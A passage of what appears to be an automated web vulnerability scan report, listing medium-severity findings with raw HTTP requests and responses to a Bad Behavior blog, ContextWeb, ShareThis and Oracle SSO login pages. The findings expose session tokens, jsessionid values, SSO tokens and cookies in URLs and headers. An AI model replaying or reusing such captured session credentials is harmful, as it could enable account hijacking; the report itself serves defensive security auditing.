href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">your support</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vV5UNoosXB63kLsoPOVZrDWmRfdWZlYoYMGVaWZu1sFGfMLn7c-oaH3P2ze&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>So if you&#8217;re interested in seeing a noncommercial Akismet replacement service, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=SGbfazrHOekCOEDoqaE51BQFocFboqDmiPHJXccY2SZ4hHrIC4lTjA0Uf3i&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">click here</a>
...[SNIP]...
<p>Anyway, I&#8217;m preparing to spend most of the weekend working on Bad Behavior. Feel free to leave your comments below. <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vV5UNoosXB63kLsoPOVZrDWmRfdWZlYoYMGVaWZu1sFGfMLn7c-oaH3P2ze&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">Nice holiday wishes</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And I wouldn&#8217;t mind if you want to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute that last $10</a>
...[SNIP]...

5.48. http://bad-behavior.ioerror.us/category/wordpress-com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress-com/

Request

GET /category/wordpress-com/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762087+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 41366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Remember, Bad Behavior is a user-driven project. If you feel that Bad Behavior has been useful to you and want to support its continued development, feel free to send along your <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">holiday wishes</a>. Yes, I know &#8217;tis the season to max out the credit cards. Still, providing you with software that worries about spam so you don&#8217;t have to is what I do. And without <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aBYL7z9tngJPWKsJhjZ2sEQlU3uQBp2HXKy5oARpTz-aLwLulUbIMUuyxzu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">your support</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And I wouldn&#8217;t mind if you want to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=QGipuOog0x5xuUPKFtlRz83otSkxrsuxoqu-d7xZl9BPuHGQtMKu9dq6M90&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute that last $10</a>
...[SNIP]...

5.49. http://bad-behavior.ioerror.us/category/wordpress/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/wordpress/

Request

GET /category/wordpress/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762068+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=DX9a18rVacMq4jm46XSi8VqnZi4FUpEx8U2uB7D0kslQ68fvRz4JQhJx0V8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=PCJPgnX7f5vR_17EQl6w8A8K74TR0lDUA4wnJSrfOkt2W7kWMJ2EBm4zZHO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O0TYuXfCXDEkp9fjembSwTsNscMGBoRzxPjb6rpAsEgB5FJ6iCXhkM3HqgC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
rs will find honest work instead, and to do so requires a significant amount of time and resources. If you&#8217;d like to help make spam a losing proposition and help stop spammers before they start, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O0TYuXfCXDEkp9fjembSwTsNscMGBoRzxPjb6rpAsEgB5FJ6iCXhkM3HqgC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.50. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Request

GET /bh/set.aspx?action=add&advid=2837&token=RCQU9 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=242|1|-8589027083575281352|1; C2W4=32S9hCcGYz3BhCx-4Dmhssu7xP3L1BddvcBxlQ4MHTj3TZsY_EbKppw; cwbh1=749%3B03%2F07%2F2011%3BDOTM6%0A1485%3B03%2F19%2F2011%3BCMST1%0A2996%3B03%2F22%2F2011%3BLOW21%0A2837%3B03%2F23%2F2011%3BRCQU1%0A357%3B03%2F25%2F2011%3BEMON1%0A2532%3B03%2F28%2F2011%3BAMQU1; V=GlchrMbA1MSR

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Set-Cookie: V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Wed, 22-Feb-2012 02:20:09 GMT; Path=/
Set-Cookie: cwbh1=749%3B03%2F07%2F2011%3BDOTM6%0A1485%3B03%2F19%2F2011%3BCMST1%0A2996%3B03%2F22%2F2011%3BLOW21%0A2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%0A2532%3B03%2F28%2F2011%3BAMQU1; Domain=.contextweb.com; Expires=Mon, 01-Feb-2016 02:20:09 GMT; Path=/
Content-Type: image/gif
Date: Sun, 27 Feb 2011 02:20:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5.51. https://communities.oracle.com/portal/server.pt/community/support/219  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://communities.oracle.com
Path:   /portal/server.pt/community/support/219

Request

GET /portal/server.pt/community/support/219 HTTP/1.1
Host: communities.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:28:15 GMT
Cache-Control: no-cache="set-cookie"
Location: https://communities.oracle.com/portal/SSOServlet;jsessionid=KrMnNpMPxmjRMfVY0GnLTpnfw7W1yXqYz08j2BbQVQzfXfF1Gzcf!1266856517?
Set-Cookie: JSESSIONID=KrMnNpMPxmjRMfVY0GnLTpnfw7W1yXqYz08j2BbQVQzfXfF1Gzcf!1266856517; path=/
Set-Cookie: plloginoccured=false; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/plain
Connection: close
Set-Cookie: comnap_V1=3809317517.25118.0000; path=/
Content-Length: 451

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://communities.oracle.com/portal/SSOServlet&#59;jsessionid=KrMnNpMPxmjRMfVY0GnLTpnfw7W1yXqYz08j2BbQVQzfXfF1Gzcf!1266856517?">https://communities.oracle.com/portal/SSOServlet&#59;jsessionid=KrMnNpMPxmjRMfVY0GnLTpnfw7W1yXqYz08j2BbQVQzfXfF1Gzcf!1266856517?</a>
...[SNIP]...

5.52. https://competencycenter.oracle.com/opncc/home.cc  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://competencycenter.oracle.com
Path:   /opncc/home.cc

Request

GET /opncc/home.cc HTTP/1.1
Host: competencycenter.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Redirect to Oracle SSO Server
Date: Sat, 26 Feb 2011 23:28:15 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~BAC50DE4~DEC0AC5035CED6CC0B3F3594BC4D1E27D57801AB3B738C530FDEC9D4D6B89FCC65E71D9A32DBEA72EB49D45517FC06A0038803027A2EB1F71F509321B26238DA31AB2107650522836D05D24AC18AF3D2CE74723E6DB6B8D2A98D510870A93F646A70A27A49006816F2151437FE2E357EE687EE46D5946A9589F7C1FE5DA5B9A9D0AADDCC6946F44E1734119286A68CC84612BBD722EBFF757FA58CB9A5F6766A8047A04BCCF2CC9A6DD638225287A7EFCE6E159C5622F745C11661E0AC6D78DCA4F910FCE7B9D1EF58524C1956B0878E
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServeropncc_pool=1762562701.20480.0000; expires=Sun, 27-Feb-2011 07:28:15 GMT; path=/
Content-Length: 984

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Redirect to Oracle SSO Server</TITLE>
</HEAD><BODY>
<H1>Redirect to Oracle SSO Server</H1>
The document has moved <A HREF="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~BAC50DE4~DEC0AC5035CED6CC0B3F3594BC4D1E27D57801AB3B738C530FDEC9D4D6B89FCC65E71D9A32DBEA72EB49D45517FC06A0038803027A2EB1F71F509321B26238DA31AB2107650522836D05D24AC18AF3D2CE74723E6DB6B8D2A98D510870A93F646A70A27A49006816F2151437FE2E357EE687EE46D5946A9589F7C1FE5DA5B9A9D0AADDCC6946F44E1734119286A68CC84612BBD722EBFF757FA58CB9A5F6766A8047A04BCCF2CC9A6DD638225287A7EFCE6E159C5622F745C11661E0AC6D78DCA4F910FCE7B9D1EF58524C1956B0878E">here</A>
...[SNIP]...

5.53. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Request

GET /pview?event=pview&publisher=95d7fcea-6f74-46b5-96ba-5b8cb88c6d14&hostname=www.project-syndicate.org&location=%2F&url=http%3A%2F%2Fwww.project-syndicate.org%2F&sessionID=1298773080048.79185&fpc=30dea60-12e64e877f0-4b740973-1&ts1298773083857.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sun, 27 Feb 2011 02:18:17 GMT
Connection: keep-alive


5.54. https://login.oracle.com/mysso/signon.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Request

GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/
Content-Length: 8754

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...

5.55. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; 